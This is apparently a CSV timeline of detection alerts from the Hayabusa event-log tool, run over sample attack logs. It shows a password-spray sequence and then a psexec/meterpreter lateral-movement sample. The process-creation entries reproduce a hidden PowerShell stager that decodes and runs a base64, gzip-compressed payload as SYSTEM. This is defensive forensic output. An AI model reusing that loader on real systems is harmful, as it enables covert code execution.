2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:03.525 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:drook/bgalbraith/edygert/jorchilles/bking/jlake/mdouglas/cspizor/bgreenwood/smisenar/ssims/cragoso/dmashburn/baker IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,-
2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 05:26:51.793 +09:00,IEWIN7,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,Exec,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3348 | PGUID: 365ABB72-AF8B-5CC8-0000-00101C1A1900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 
05:26:52.090 +09:00,IEWIN7,1,medium,Exec | C2,Curl Start Combination,,rules/sigma/process_creation/proc_creation_win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,info,,Process Created,"Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 3872 | PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell 
Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas,FromBase64String Command 
